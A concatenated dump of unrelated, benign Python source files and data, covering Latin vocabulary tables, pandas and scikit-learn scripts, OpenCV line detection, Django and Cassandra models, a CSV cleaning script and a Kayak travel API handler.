('PERPERAM', 734, 'perperam', 'wrongly, incorrectly', '', '2_14', 1), ('PONDVS', 735, 'pondus', 'weight', '', '2_14', 1), ('PRAESERTIM', 736, 'praesertim', 'especially', '', '2_14', 1), ('QVIES', 737, 'quies', 'rest, repose', '', '2_14', 1), ('VNDIQVE', 738, 'undique', 'from all parts, from everywhere', '', '2_14', 1), ('VOLVO', 739, 'volvo', 'to turn round', '', '2_14', 1), ('VT/4', 740, 'ut', 'that, to, in order to, so that', '', '2_14', 4), ('ANIMADVERTO', 741, 'animadverto', 'to notice', '', '2_15', 1), ('APPROPINQVO', 742, 'appropinquo', 'to approach (w/ dat or ad + acc.)', '', '2_15', 1), ('CERNO', 743, 'cerno', 'to see, distinguish with the eyes', '', '2_15', 1), ('CIRCA/2', 744, 'circa', 'around (w/ acc.)', '', '2_15', 1), ('CLAMO', 745, 'clamo', 'to shout, scream', '', '2_15', 1), ('FINGO', 746, 'fingo', 'to imagine, form in the mind', '', '2_15', 1), ('IMPINGO', 747, 'impingo', 'to push, strike, inflict', '', '2_15', 1), ('INFLIGO', 748, 'infligo', 'to strike on or against, inflict', '', '2_15', 1), ('ITERVM', 749, 'iterum', 'again', '', '2_15', 1), ('OPPIDVM', 750, 'oppidum', 'town', '', '2_15', 1), ('PERCVTIO', 751, 'percutio', 'to strike through ', '', '2_15', 1), ('PRAEDITVS', 752, 'praeditus', 'endowed with, possessed of (w/ abl.)', '', '2_15', 1), ('REPELLO', 753, 'repello', 'to push back, thrust back', '', '2_15', 1), ('RIDEO', 754, 'rideo', 'to laugh', '', '2_15', 1), ('RVMPO', 755, 'rumpo', 'to break, tear', '', '2_15', 1), ('SEDES', 756, 'sedes', 'seat, abode', '', '2_15', 1), ('SIC', 757, 'sic', 'in such a way', '', '2_15', 1), ('SIDVS', 758, 'sidus', 'constellation', '', '2_15', 1), ('TELVM', 759, 'telum', 'spear, javelin', '', '2_15', 1), ('VEHO', 760, 'veho', 'to drive, carry', '', '2_15', 1)]
section_list ={'1.1': 'start', '1.2': '1.1', '1.3': '1.2', '1.4': '1.3', '1.5': '1.4', '1.6': '1.5', '1.7': '1.6', '1.8': '1.7', '1.9': '1.8', '1.10': '1.9', '1.11': '1.10', '1.12': '1.11', '1.13': '1.12', '1.14': '1.13', '1.15': '1.14', '1.16': '1.15', '1.17': '1.16', '1.18': '1.17', '1.19': '1.18', '1.20': '1.19', '1.21': '1.20', '2.1': '1.21', '2.2': '2.1', '2.3': '2.2', '2.4': '2.3', '2.5': '2.4', '2.6': '2.5', '2.7': '2.6', '2.8': '2.7', '2.9': '2.8', '2.10': '2.9', '2.11': '2.10', '2.12': '2.11', '2.13': '2.12', '2.14': '2.13', '2.15': '2.14', 'end': '2.15', 'start': 'start'}
title = "Latin for the New Millennium Vols 1 and 2 (Tunberg-Minkova)"
section_level = 2
language = "Latin"
book = text.Text(title, section_words, the_text, section_list, section_level, language, True, False) |
9,531 | 6028b46eab422dea02af24e9cf724fe0d8b3ecc4 | import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.model_selection import GroupKFold
from sklearn.linear_model import LinearRegression
from sklearn.metrics import mean_squared_log_error
from sklearn.preprocessing import OneHotEncoder
from sklearn.linear_model import Lasso
def test_lasso():
test = pd.read_csv('./data/test.csv')
building_metadata = pd.read_csv('./data/building_metadata.csv')
weather_test = pd.read_csv('./data/weather_test.csv')
# Sort data for future imputation
test.sort_values(by=['building_id','timestamp'], inplace=True)
# Merging data
test = (test
.merge(building_metadata, on = 'building_id', how='left')
.merge(weather_test, on = ['site_id','timestamp'], how='left'))
del building_metadata
del weather_test
#Add dates variables
test['timestamp'] = pd.to_datetime(test['timestamp'])
test['hour'] = test.timestamp.dt.hour
test['wday'] = test.timestamp.dt.dayofweek
test['week'] = test.timestamp.dt.weekofyear
#Eliminate problematic variables
test.drop(['timestamp','year_built','floor_count','cloud_coverage','site_id','primary_use','wind_direction','square_feet','dew_temperature','sea_level_pressure','wind_speed','precip_depth_1_hr'], inplace=True, axis = 1)
# Imputation
test = test.interpolate()
test.drop(test[test.hour==0].index, inplace=True)
test.drop(test[test.hour==1].index, inplace=True)
test.drop(test[test.hour==2].index, inplace=True)
test.drop(test[test.hour==3].index, inplace=True)
test.drop(test[test.hour==4].index, inplace=True)
test.drop(test[test.hour==5].index, inplace=True)
test.drop(test[test.hour==6].index, inplace=True)
test.drop(test[test.hour==7].index, inplace=True)
test.drop(test[test.hour==8].index, inplace=True)
test.drop(test[test.hour==9].index, inplace=True)
test.drop(test[test.hour==10].index, inplace=True)
test.drop(test[test.hour==11].index, inplace=True)
test.drop(test[test.hour==12].index, inplace=True)
test.drop(test[test.hour==13].index, inplace=True)
test.drop(test[test.hour==14].index, inplace=True)
test.drop(test[test.hour==15].index, inplace=True)
test.drop(test[test.hour==16].index, inplace=True)
test.drop(test[test.hour==17].index, inplace=True)
test.drop(test[test.hour==18].index, inplace=True)
test.drop(test[test.hour==19].index, inplace=True)
test.drop(test[test.hour==20].index, inplace=True)
test.drop(test[test.hour==21].index, inplace=True)
# One Hot Encoding
encode = OneHotEncoder(categories='auto',drop = 'first')
catego_var = test.loc[:,['building_id','meter']].to_numpy()
catego_var = encode.fit_transform(catego_var).toarray()
encode_names = test.building_id.unique().tolist()[1:] + ['meter_1','meter_2','meter_3']
encode_var = pd.DataFrame(catego_var, columns = encode_names)
test.drop('meter', inplace=True, axis = 1)
test.reset_index(drop=True,inplace=True)
test = test.join(encode_var)
# Add row as set_index
test.set_index('row_id', inplace=True)
return test
#X_train, y_train = train_lasso()
#mod_lasso = Lasso()
#mod_lasso.fit(X_train, y_train)
#print(mod_lasso.coef_)
from joblib import dump, load
mod_lasso = load('mod_lasso.joblib')
X_test = test_lasso()
y_pred = mod_lasso.predict(X_test)
print(X_test.head())
sub = pd.DataFrame(np.maximum(0,y_pred), index = X_test.index, columns = ['meter_reading'])
sub.sort_values(by = 'row_id', inplace = True)
sub.to_csv('./submission12.csv') |
9,532 | 821afa85eb783b4bf1018800f598a3294c4cbcfb | from django.contrib import admin
# Register your models here.
from registration.models import FbAuth
class AllFieldsAdmin(admin.ModelAdmin):
"""
A model admin that displays all field in admin excpet Many to many and pk field
"""
def __init__(self, model, admin_site):
self.list_display = [field.name for field in model._meta.fields
if field.name not in ["id"]]
super(AllFieldsAdmin, self).__init__(model, admin_site)
admin.site.register(FbAuth) |
9,533 | 15e0b396a4726f98ce5ae2620338d7d48985707e | try:
fh = open("testfile","w")
fh.write("test")
except IOError:
print("Error:没有找到文件")
else:
print("sucess")
fh.close()
|
9,534 | 60079005c2091d2dc0b76fb71739671873f0e0f1 | import threading
import time
g_num = 0
def work1(num):
global g_num
for i in range(num):
g_num += 1
print("__in work1: g_num is {}".format(g_num))
def work2(num):
global g_num
for i in range(num):
g_num += 1
print("__in work2: g_num is {}".format(g_num))
def main():
print("__线程创建之前g_num is {}".format(g_num))
# num = 100 or 10000000
num = 10000000000
t1 = threading.Thread(target=work1, args=(num,))
t1.start()
t2 = threading.Thread(target=work2, args=(num,))
t2.start()
while len(threading.enumerate()) != 1:
time.sleep(1)
print("2个线程对同一个全局变量操作之后的最终结果是:{}".format(g_num))
if __name__ == "__main__":
main()
|
9,535 | ff7cb8261f3abb70599725fe7c598c571d037226 | ## 허프변환에 의한 직선 검출
# cv2.HoughLines(image, rho, theta, threshold, lines=None, srn=None, stn=None, min-theta=None, max-theta=None) => lines
# image : 에지 입력 영상(Canny 연산을 이용한 에지 영상)
# rho(로우) : 축적 배열에서 rho 값의 간격(보통 1.0 사용)
# theta(세타) : 축적 배열에서 theta 값의 간격(보통 np.pi/180)
# rho, theta 값이 커지면 축적배열의 크기는 작아지고, 값이 작으면 축적배열은 커진다.
# 축적배열이 크면 정교한 직선을 표현할 수 있으나, 연산량이 많아진다.
# 축적배열이 작아면 정밀한 직선을 표현할 수 없으나, 연산량이 적어 속도는 빠르다.
# threshold : 축적배열에서 직선으로 판단할 임계값(임계값을 낮추면 많은 직선 검출, 반대로 높이면 검출되는 직선은 줄어든다.
# lines : rho, theta 값을 담고 있는 3차원 행렬(numpy.ndarray) 형태로 리턴된다.
# rho, theta를 행렬로 표현한다고 하면 rho, theta 2개만 있으면 되는데
# c++에서 파이썬으로 넘어오면서 쓸데없는 값이 추가되었다.
# lines 의 shape은 (N, 1, 2), dtype = numpy.float32 **shape 주의할 것
# 가운데 1이 의미없는 값. 그래서 나중에 코드화할 때 [0]을 집어넣으면 된다.
# rho, theta값은 우리가 알아보기 힘들다.
## 확률적 허프 변환
# cv2.HoughLinesP(image, rho, theta, threshold, lines=None, minLineLength=None, maxLineGap=None)
# image : 에지 입력 영상(Canny 연산을 이용한 에지 영상)
# rho(로우) : 축적 배열에서 rho 값의 간격(보통 1.0 사용)
# theta(세타) : 축적 배열에서 theta 값의 간격(보통 np.pi/180)
# threshold : 축적배열에서 직선으로 판단할 임계값(임계값을 낮추면 많은 직선 검출, 반대로 높이면 검출되는 직선은 줄어든다.
# lines : 선분의 시작과 끝 좌표(x1, y1, x2, y2) 정보를 담고 있는 numpy.ndarray
# shape=(N, 1, 4), dtype = numpy.int32
# minLineLength : 검출하기 위한 선분의 최소 길이. (최소길이에 못미치면 검출X)
# maxLineGap : 직선으로 간주하기 위한 최대 에지 점 간격. 기본값 0
# 기본값이 0일 때는, _ _ 이렇게 에지에 간격이 있으면 하나의 직선으로 보지 않고,
# 이 값을 4로 줬을 때는, __ _ __ ___ 이렇게 간격이 3개 있어도 하나의 직선으로 본다.
import sys, cv2, numpy as np
# src = cv2.imread('./images/bd.png', cv2.IMREAD_GRAYSCALE)
src = cv2.imread('./images/bd2.jpg', cv2.IMREAD_GRAYSCALE)
if src is None:
print('Image load failed')
sys.exit()
edges = cv2.Canny(src, 50, 150)
lines = cv2.HoughLinesP(edges, 1, np.pi/180.0, 150, minLineLength=50, maxLineGap=5) # threshold값 ↑적게검출 ↓많이검출
# 색을 칠해서 선분을 표현할 거니까 해당 edge를 BGR로 바꿔줘야함. Canny()하면 grayscale됨.
dst = cv2.cvtColor(edges, cv2.COLOR_GRAY2BGR)
if lines is not None:
for i in range(lines.shape[0]): # N개 검출됨. N의 값은 알 수 없다.
pt1 = (lines[i][0][0], lines[i][0][1]) # 시작점 좌표, 가운데 값은 무조건 0으로
pt2 = (lines[i][0][2], lines[i][0][3]) # 끝점 좌표, 가운데 값은 무조건 0으로
cv2.line(dst, pt1, pt2, (0,255,0), 2, cv2.LINE_AA)
cv2.imshow('src',src)
cv2.imshow('edges',edges)
cv2.imshow('dst',dst)
cv2.waitKey()
cv2.destroyAllWindows() |
9,536 | 00429a16ac009f6f706ef11bc29b0aec77b9ebe6 | import pandas as pd
iris_nan = pd.read_csv("MLData/iris_nan.csv")
iris_nan.head()
Y = iris_nan["class"].values
X = iris_nan.drop("class", axis=1)
# Our iris dataframe presents some NaN values, and we need to fix that.
# We got some methods to apply on a pandas dataframe:
# 1: Drop records presenting a NaN value: We can achieve that with dropna, which
# will drop all the records presenting a NaN value inside.
# With dropna() executed, it will remove all the records (rows) presenting a Nan.
iris_nan.dropna()
# 2: A more intrusive method is to use dropna for each row/column that present
# a NaN value. We can drop an entire column presenting a NaN value by using dropna
# and specifying the axix: 0 for the row, 1 for the column. In this case, it will
# then drop the petal_lenght column.
iris_nan.dropna(axis=1)
# 3: A better method is to REPLACE NaN value with another one, that usually match
# Mean, Median or the Mode. Let's see all of them:
# MEAN - We calculate the mean of the iris_nan dataframe, and the use the method
# fillna passing the mean to fill the NaN value with the average. Note that,
# using mean on the entire dataframe will return a Series (dataframe) containing,
# for all the labels the mean of all their values. We then use this series with
# fillna() that will fill each NaN with the appropriate value based on the label
# they appear to be NaN in.
mean_replace = iris_nan.mean()
iris_nan.fillna(mean_replace)
# MEDIAN - The median is the "middle" value of a specific range of values.
# The median() function works exactly like mean(), it will return a series that
# will be used by fillna() to replace the missing NaN values.
median_replace = iris_nan.median()
iris_nan.fillna(median_replace)
# MODE - The mode is just the element that appears the most into a set of elements.
# For example, given the array 3,7,9,13,18,18,24 his mode would be 18 cause it's
# the element that appears the most. With each value being unique, there will be
# no mode. the function mode() will return an entire dataframe composed by, the
# first row as the mode (if present) and the others as NaN. We then need to access
# just the first row of this dataframe, and we can do that by using ILOC (that
# works by indexing) using 0 as argument to indicate the first row. We then use
# fillna to replace the values.
mode_replace = iris_nan.mode().iloc[0]
iris_nan.fillna(mode_replace)
# For the numpy array we use another simple method: The Imputer. An imputer is just
# a tool to fill missing values inside of a numpy array. We need to import it as
# follow: From sklearn 0.22 onward we need to import SimpleImputer since imputer
# has been deprecated.
from sklearn.impute import SimpleImputer
import numpy as np
# we then create an imputer object: We need to specify two things:
# 1) Strategy: could be mean, median or mode. Works exactly like the previous
# examples.
# 2) Missing values: we need to pass the nan type, specifiied by np.nan.
imputer = SimpleImputer(strategy="mean", missing_values=np.nan)
# We then use fit_transform: as we already know, fit_transform is a combination by
# both function fit and transform. It initially calculate the mean/median/mode with
# the function FIT (X' = X - Mean / STD) and then will TRANSFORM all the np.NaN
# values into the argument passed (could be a dataframe) returning a numpy array
# with all the nan filled.
X_imputed = imputer.fit_transform(X)
X_imputed
|
9,537 | c60b8eec57d845c73ee3e00432747d23748c1706 | import tensorflow as tf
def Float32():
return tf.float32
def Float16():
return tf.float16 |
9,538 | 8de6877f040a7234da73b55c8b7fdefe20bc0d6e | import pandas as pd
df = pd.read_csv('~/Documents/data/tables.csv')
mdfile = open('tables_with_refs.md', 'w')
mdfile.write('# Tables with references\n')
for i, row in df.iterrows():
t = '\n```\n{% raw %}\n' + str(row['table']) + '\n{% endraw %}\n```\n'
r = '\n```\n{% raw %}\n' + str(row['refs']) + '\n{% endraw %}\n```\n'
mdfile.write('\nExample ' + str(i + 1))
mdfile.write('\nTable:\n')
mdfile.write(t)
mdfile.write('References:\n')
mdfile.write(r) |
9,539 | 8559448822b3d3989a9795e7b497a2791588c327 | f = open("resources/yesterday.txt", 'r')
yesterday_lyric = ""
while 1 :
line = f.readline()
if not line :
break
yesterday_lyric = yesterday_lyric + line.strip() + "\n"
f.close()
# 대소문자 구분없이 yesterday 단어의 개수 세기 : 대문자로 또는 소문자로 만들고 카운드 세기
num_of_yesterday = yesterday_lyric.upper().count("YESTERDAY")
print("Number of a Word 'YESTERDAY'", num_of_yesterday)
# 대소문자 구분하여 Yesterday 와 yesterday의 개수를 세보자.
num_of_small_yesterday = yesterday_lyric.count("yesterday")
num_of_title_yesterday = yesterday_lyric.count("Yesterday")
print("Number of a Word 'yesterday'", num_of_small_yesterday)
print("Number of a Word 'Yesterday'", num_of_title_yesterday)
|
9,540 | d7b91b0476a1f2e00408ce1f1501bf98d4c06e4e | # -*- coding: utf-8 -*-
# @Author: Marcela Campo
# @Date: 2016-05-06 18:56:47
# @Last Modified by: Marcela Campo
# @Last Modified time: 2016-05-06 19:03:21
import os
from flask.ext.script import Manager
from flask.ext.migrate import Migrate, MigrateCommand
from server import app, db
app.config.from_object('config.DevelopmentConfig')
migrate = Migrate(app, db)
manager = Manager(app)
manager.add_command('db', MigrateCommand)
if __name__ == '__main__':
manager.run()
|
9,541 | 33daf5753b27f6b4bcb7c98e28cf2168e7f0b403 |
#calss header
class _WATERWAYS():
def __init__(self,):
self.name = "WATERWAYS"
self.definitions = waterway
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['waterway']
|
9,542 | 73cacc1317c8624b45c017144bc7449bc99bd045 | import torch
from torchelie.data_learning import *
def test_pixel_image():
pi = PixelImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(3, 128, 128)
pi = PixelImage((1, 3, 128, 128), init_img=start)
assert start.allclose(pi() + 0.5, atol=1e-7)
def test_spectral_image():
pi = SpectralImage((1, 3, 128, 128), 0.01)
pi()
start = torch.randn(1, 3, 128, 128)
pi = SpectralImage((1, 3, 128, 128), init_img=start)
def test_correlate_colors():
corr = CorrelateColors()
start = torch.randn(1, 3, 64, 64)
assert start.allclose(corr.invert(corr(start)), atol=1e-5)
def test_parameterized_img():
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
ParameterizedImg(1, 3,
128,
128,
space='spectral',
colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='uncorr')()
start = torch.clamp(torch.randn(1, 3, 128, 129) + 0.5, min=0, max=1)
ParameterizedImg(1, 3,
128,
129,
space='spectral',
colors='uncorr',
init_img=start)()
start = torch.clamp(torch.randn(1, 3, 128, 128) + 0.5, min=0, max=1)
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='uncorr')()
ParameterizedImg(1, 3,
128,
128,
space='pixel',
colors='uncorr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='spectral', colors='corr')()
ParameterizedImg(1, 3,
128,
128,
space='spectral',
colors='corr',
init_img=start)()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr')()
ParameterizedImg(1, 3, 128, 128, space='pixel', colors='corr',
init_img=start)()
|
9,543 | 9cb734f67d5149b052ff1d412d446aea1654fa69 | import uuid
from cqlengine import columns
from cqlengine.models import Model
from datetime import datetime as dt
class MBase(Model):
__abstract__ = True
#__keyspace__ = model_keyspace
class Post(MBase):
id = columns.BigInt(index=True, primary_key=True)
user_id = columns.Integer(required=True, index=True)
text = columns.Text(required=True)
likes = columns.Counter
class Project(MBase):
id = columns.Integer(primary_key=True)
follower_count = columns.Counter
class Channel(MBase):
id = columns.Integer(primary_key=True)
slug = columns.Text(required=True, index=True)
name = columns.Text(required=True)
class User(MBase):
id = columns.Integer(primary_key=True)
nick = columns.Text(required=True, index=True)
follower_count = columns.Counter
following_count = columns.Counter
extended = columns.Map(columns.Text, columns.Text)
class UserTimeLine(MBase):
"""
POSTs that user will see in their timeline
"""
user_id = columns.Integer(primary_key=True)
post_id = columns.BigInt(primary_key=True)
class UserProject(MBase):
"""
Projects that user follows
"""
user_id = columns.Integer(primary_key=True)
project_id = columns.Integer(primary_key=True)
class UserPost(MBase):
"""
All the POSTs of a user
"""
user_id = columns.Integer(primary_key=True)
post_id = columns.BigInt(primary_key=True)
class UserFollower(MBase):
"""
Followers of a user
"""
user_id = columns.Integer(primary_key=True)
follower_id = columns.Integer(primary_key=True)
class UserFollowing(MBase):
"""
A user follows another user
"""
user_id = columns.Integer(primary_key=True)
following_id = columns.Integer(primary_key=True)
class ProjectFollower(MBase):
project_id = columns.Integer(primary_key=True)
user_id = columns.Integer(primary_key=True)
class PostFollower(MBase):
post_id = columns.TimeUUID(primary_key=True)
user_id = columns.Integer(primary_key=True)
class ChannelFollower(MBase):
channel_id = columns.Integer(primary_key=True)
user_id = columns.Integer(primary_key=True)
class ChannelTimeLine(MBase):
channel_id = columns.Integer(primary_key=True)
post_id = columns.BigInt(primary_key=True)
class ProjectTimeLine(MBase):
project_id = columns.Integer(primary_key=True)
post_id = columns.BigInt(primary_key=True)
class PostLike(MBase):
post_id = columns.BigInt(primary_key=True)
user_id = columns.Integer(primary_key=True)
class PostComment(MBase):
post_id = columns.BigInt(primary_key=True)
comment_id = columns.BigInt(primary_key=True)
|
9,544 | 38c1b82a29a5ad0b4581e63fb083ca2487a79817 | #Created by Jake Hansen for Zebra interview take home assessment, July 2020.
import csv, os, sys, pickle
from datetime import date
#Class For storing information about each file generally. Helpful for future
#use cases to remember the indicies from a file, if file has thousands of fields
#Also can be used as a log to store daily number of 'good' vs 'bad' rows
class DataSource:
def __init__(self, name, usableRows, errorRows, indices):
self.name = name
self.usableRows = usableRows
self.errorRows = errorRows
self.indices = indices
# getHeaderIndexes(indices, headers)
# Requires: Pre-populated indices dictionary, the header's row from a CSV file with
# naming convention conforming to the schema output from the directions
# Effects: Determines if file has the necessary colums to match the desired output
# schema
# Modifies: The indices variable, returning the correct indices within the csv row
def getHeaderIndexes(indices, headers):
counter = -1
a,b,c,d,e,f,g = False, False, False, False,False,False,False
for header in headers:
counter += 1
if header.strip() == 'Provider Name':
a = True
indices['Provider Name'] = counter
elif header.strip() == 'CampaignID':
b = True
indices['CampaignID'] = counter
elif header.strip() == 'Cost Per Ad Click':
c = True
indices['Cost Per Ad Click'] = counter
elif header.strip() == 'Redirect Link':
d = True
indices['Redirect Link'] = counter
elif header.strip() == 'Phone Number':
e = True
indices['Phone Number'] = counter
elif header.strip() == 'Address':
f = True
indices['Address'] = counter
elif header.strip() == 'Zipcode':
g = True
indices['Zipcode'] = counter
if a == True and b == True and c == True and d == True and e == True and f == True and g == True:
valid = True
else:
valid = False
return indices, valid
# isRowValid(indices,row)
# Requires: a valid CSV file with columns necessary to match the expected output
# Effects: Determines if a single row should be added to the final output, or if
# the row is missing data / has incorrect data types for the field and thus
# will not be added to the output but instead printed out
# Modifies: N/A
def isRowValid(indices, row):
#String Non-Nullables
sNNs = ['Provider Name', 'CampaignID', 'Redirect Link', 'Address', 'Zipcode']
for column in sNNs:
currentCheck = row[indices[column]].strip()
if isinstance(currentCheck, str) and len(currentCheck) > 0 and currentCheck != 'NULL':
pass
else:
return False
#Float Non Nullables
fNNs = ['Cost Per Ad Click']
for column in fNNs:
currentCheck = row[indices[column]].strip('"')
currentCheck = currentCheck.strip("'")
try:
float(currentCheck)
except:
return False
#String Nullables
sNs = ['Phone Number']
#No Check Required, because it can be nullable or a string. I do assume that
#it is required to have a "Phone Number" column, which is checked for in getHeaderIndexes
return True
# addUsableRow(indices, row, finalOutput)
# Requires: The row is known to follow the output schema as specificed in the requirements
# Effects: Adds row variables in the order specified in the output schema
# Modifies: the final output variable
def addUsableRow(indices, row, finalOutput):
pn = row[indices['Provider Name']].strip('"')
cid = row[indices['CampaignID']].strip('"')
cpac = row[indices['Cost Per Ad Click']].strip('"')
rl = row[indices['Redirect Link']].strip('"')
if row[indices['Phone Number']] == '':
phn = 'NULL'
else:
phn = row[indices['Phone Number']].strip('"')
ad = row[indices['Address']].strip('"')
zc = row[indices['Zipcode']].strip('"')
temp = '"'+ pn + '","' + cid + '","' + cpac + '","' + rl + '","' + phn + '","' + ad + '","' + zc + '"' + '\n'
finalOutput += temp
return finalOutput
# addErrorRow(indices, row, errorFinalOutput)
# Requires: The row does not follow the output schema
# Effects: adds the row to the error output variable that will be printed out
# Modifies: the error final output string which gets printed at the end of the daily
# job / procedure / script/ whatever The Zebra prefers to call these python data projects
def addErrorRow(indices, row, errorFinalOutput):
temp = 'Error: ' + '\n'
for thing in row:
temp += thing + ','
temp = temp[:-1]
temp += '\n'
errorFinalOutput += temp
return errorFinalOutput
#Variables and data structures
finalOutput = 'Provider Name, CampaignID, Cost Per Ad Click, RedirectLink, Phone Number, Address, Zipcode' + '\n'
errorFinalOutput = ''
# outputFileName = 'outputFilesTest/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
outputFileName = 'outputFiles/ZebraAssignmentOutput-' + str(date.today()) + '.csv'
pickelFileName = 'pickle/' + str(date.today())
# pickelFileName = 'pickleTest/' + str(date.today())
pickleDict = {}
maxLines = 99999
dataSources = []
indices = {
"Provider Name": 0,
"CampaignID": 0,
"Cost Per Ad Click": 0,
"Redirect Link": 0,
"Phone Number": 0,
"Address": 0,
"Zipcode": 0
}
#InputFiles in list form
# inputList = [
# 'inputFilesTest/Auto.csv',
# 'inputFilesTest/Home.csv'
# ]
# InputFiles in a directory
inputDirectory = 'inputFiles'
#check if files are too large, or non-csv files
currentLines = 0
for file in os.listdir(inputDirectory):
# for file in inputList:
# currentLines += sum(1 for line in open(file))
currentLines += sum(1 for line in open(inputDirectory + '/' + file))
if currentLines > maxLines:
sys.exit('Error: Too many lines')
if file[-3:] != 'csv':
sys.exit('Error: Given file not a .csv file')
#Main Algorithm loop through all files in the list
for file in os.listdir(inputDirectory):
# for file in inputList:
#usableRows and errorRows used for storing information from each data source
usableRows = 0
errorRows = 0
# with open(file, newline='') as f:
with open(inputDirectory + '/' + file, newline='') as f:
reader = csv.reader(f)
try:
headers = next(reader)
except:
headers = ''
indicesCurrent, valid = getHeaderIndexes(indices, headers)
if valid == True:
for row in reader:
if isRowValid(indicesCurrent, row):
finalOutput = addUsableRow(indicesCurrent,row, finalOutput)
usableRows += 1
else:
errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
errorRows += 1
pickleDict[file] = indicesCurrent
else:
for row in reader:
errorFinalOutput = addErrorRow(indicesCurrent, row, errorFinalOutput)
errorRows += 1
f.close()
#Add dataSource Information for possible future needs and logging purposes
newDataSource = DataSource(file,usableRows, errorRows, indices)
dataSources.append(newDataSource)
#Create file with rows containing correct schema
with open(outputFileName, 'w+') as f:
f.write(finalOutput)
f.close()
#print the incorrect rows
print(errorFinalOutput)
#Create Pickel file containing data source info for daily logging
with open(pickelFileName, 'wb') as f:
pickle.dump(dataSources, f)
f.close()
#Create Pickle File dictionary with indices specific info for filenames
with open('pickle/masterDict', 'wb') as f:
pickle.dump(pickleDict, f)
f.close()
#Thank you line
print("Thanks for taking the time to look at my code and consider me for this position. Cheers!")
|
9,545 | c8ab53c77ff3646a30ca49eaafc275afeadd2ca6 | from __future__ import division # floating point division
import csv
import random
import math
import numpy as np
import dataloader as dtl
import classalgorithms as algs
def getaccuracy(ytest, predictions):
correct = 0
for i in range(len(ytest)):
if ytest[i] == predictions[i]:
correct += 1
return (correct/float(len(ytest))) * 100.0
def geterror(ytest, predictions):
return (100.0-getaccuracy(ytest, predictions))
if __name__ == '__main__':
trainsize = 1000
testsize = 5000
numruns = 1
classalgs = {'Random': algs.Classifier(),
#'Naive Bayes': algs.NaiveBayes({'notusecolumnones': True}),
#'Naive Bayes Ones': algs.NaiveBayes({'notusecolumnones': False}),
#'Linear Regression': algs.LinearRegressionClass(),
#'Logistic Regression': algs.LogitReg(),
#'L1 Logistic Regression': algs.LogitReg({'regularizer': 'l1'}),
#'L2 Logistic Regression': algs.LogitReg({'regularizer': 'l2'}),
'Logistic Alternative': algs.LogitRegAlternative(),
#'Neural Network': algs.NeuralNet({'epochs': 100,'alpha':.01})
}
numalgs = len(classalgs)
parameters = (
#Regularization Weight, neural network height?
{'regwgt': 0.0, 'nh': 4},
#{'regwgt': 0.01, 'nh': 8},
#{'regwgt': 0.05, 'nh': 16},
#{'regwgt': 0.1, 'nh': 32},
)
numparams = len(parameters)
errors = {}
for learnername in classalgs:
errors[learnername] = np.zeros((numparams,numruns))
for r in range(numruns):
print ""
print "**********//////////////########### Run Number : ",(r+1),"###########\\\\\\\\\\\\\\\\\\\\\\\\\\\\*********"
print ""
##
##Fetching Data; Put Condition Which DataSet To Run
##
trainset, testset = dtl.load_susy(trainsize,testsize)
#trainset, testset = dtl.load_susy_complete(trainsize,testsize)
print('Running on train={0} and test={1} samples for run {2}').format(trainset[0].shape[0], testset[0].shape[0],r)
for p in range(numparams):
print ""
print "********** Parameter : ",(p+1),"**********"
print ""
params = parameters[p]
for learnername, learner in classalgs.iteritems():
# Reset learner for new parameters
learner.reset(params)
print "\n"
print 'Running learner = ' + learnername + ' on parameters ' + str(learner.getparams())
print ""
# Train model
learner.learn(trainset[0], trainset[1])
# Test model
predictions = learner.predict(testset[0])
error = geterror(testset[1], predictions)
print 'Error for ' + learnername + ': ' + str(error)
errors[learnername][p,r] = error
print ""
print "Some More Information : "
print ""
for learnername, learner in classalgs.iteritems():
besterror = np.mean(errors[learnername][0,:])
bestparams = 0
for p in range(numparams):
aveerror = np.mean(errors[learnername][p,:])
if aveerror < besterror:
besterror = aveerror
bestparams = p
# Extract best parameters
learner.reset(parameters[bestparams])
print 'Best parameters for ' + learnername + ': ' + str(learner.getparams())
print 'Average error for ' + learnername + ': ' + str(besterror) + ' +- ' + str(1.96*np.std(errors[learnername][bestparams,:])/math.sqrt(numruns))
|
9,546 | 08568c31e5a404957c11eca9cbc9472c71cf088b | import os
import re
import logging
import time
from string import replace
from settings import *
import wsgiref.handlers
from google.appengine.ext import webapp
from google.appengine.ext.webapp import template
from modules.xml2dict import *
from modules import kayak
from modules.messaging import *
from modules.cron import *
kayak = kayak.Kayak(
SETTINGS['Kayak']['API_TOKEN'],
SETTINGS['Kayak']['BASE_URL'],
)
class MainHandler(webapp.RequestHandler):
def get(self):
pass
'''
messages = twitter.statuses.mentions()
mydict = {'messages':{}}
counter = 0
for message in messages:
mydict['messages'][('%s' % counter)] = message
counter += 1
path = os.path.join(os.path.dirname(__file__), 'templates/index.html')
self.response.out.write(template.render(path, mydict))
'''
class CronHandler(webapp.RequestHandler):
def get(self):
cron = Cron()
cron.init_scheduler()
cron.run()
class KayakApi(webapp.RequestHandler):
def get(self):
messaging = Messaging()
messaging.collect_messages()
messaging.process_messages()
kayak_session = kayak.get_session()
logging.debug(kayak_session.content)
session_id = re.search('<sid>(.*?)</sid>', kayak_session.content)
session_id = session_id.group(1)
kayak.session_id = session_id
kayak.headers = { 'Cookie' : kayak_session.headers['set-cookie'] }
kayak_search = kayak.post_search(
messaging.mentions['from'],
messaging.mentions['to'],
messaging.mentions['departure']['day'] + '/' + messaging.mentions['departure']['month'] + '/' + messaging.mentions['departure']['year'],
messaging.mentions['retour']['day'] + '/' + messaging.mentions['retour']['month'] + '/' + messaging.mentions['retour']['year']
)
logging.debug(kayak_search.content)
search_id = re.search('<searchid>(.*?)</searchid>', kayak_search.content)
search_id = search_id.group(1)
kayak.search_id = search_id
kayak_results = kayak.get_results()
logging.debug(kayak_results.content)
result_set = ''
more_pending = re.search('<morepending>true</morepending>', kayak_results.content)
if more_pending.group(0) is not None:
more_pending = True
if more_pending:
time.sleep(10)
kayak_results = kayak.get_results()
result_set = kayak_results.content
logging.debug(kayak_results.content)
content = replace(result_set, '&', '&')
xml = XML2Dict()
trips = xml.fromstring(content)
